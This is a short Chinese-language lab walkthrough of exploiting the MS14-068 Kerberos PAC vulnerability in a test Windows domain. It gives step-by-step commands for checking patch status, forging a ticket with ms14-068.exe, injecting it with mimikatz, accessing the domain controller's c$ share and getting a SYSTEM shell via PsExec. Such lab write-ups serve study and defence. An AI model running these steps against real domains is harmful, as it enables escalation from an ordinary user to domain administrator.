这里便用到了我们之前所讲到的 PAC 这个东西,PAC 是用来验证 Client 的访问权限的,它会被TGT 里发送给 Client,然后由 Client 发送给 TGS。但也恰恰是这个 PAC 造成了 MS14-068 这个漏洞。
该漏洞是位于 kdcsvc.dll 域控制器的密钥分发中心(KDC)服务中的 Windows 漏洞,它允许经过身份验证的用户在其获得的票证 TGT 中插入任意的 PAC 。普通用户可以通过呈现具有改变了 PAC 的 TGT 来伪造票据获得管理员权限
该漏洞在windows server2012环境的域控中可能会发生报错
环境信息
windows server2008 R2(域控):192.168.197.4
windows 7(成员机):192.168.197.133
查看本地主机信息
使用域内主机域内普通用户登录
net config workstation
查看域管主机信息
nltest /dsgetdc:
查看本地是否打补丁
systeminfo |find "3011780"
返回空证明没打补丁
本地访问测试
dir \\WIN-S50F8HMOEBD.dc1.com\c$
查看用户信息
whoami -user
使用ms14-068伪造票据:
ms14-068.exe -u test@dc1.com -p 123 -s S-1-5-21-3698873215-1888486255-1844816113-1107 -d WIN-S50F8HMOEBD.dc1.com
ms14-068.exe -u 域成员名@域名 -p 域成员密码 -s 域成员 sid -d 域控制器地址
生成对应文件
使用mimikatz来清除和写入凭证
kerberos::purge //清除凭证
kerberos::ptc 票据地址
再次链接后不会拒绝
dir \\WIN-S50F8HMOEBD.dc1.com\c$
反弹shell
PsExec64.exe /accepteula /s \\WIN-S50F8HMOEBD.dc1.com cmd
系统权限
域管IP
当域控是windows server2012时
会有以下拦截,不知道是什么情况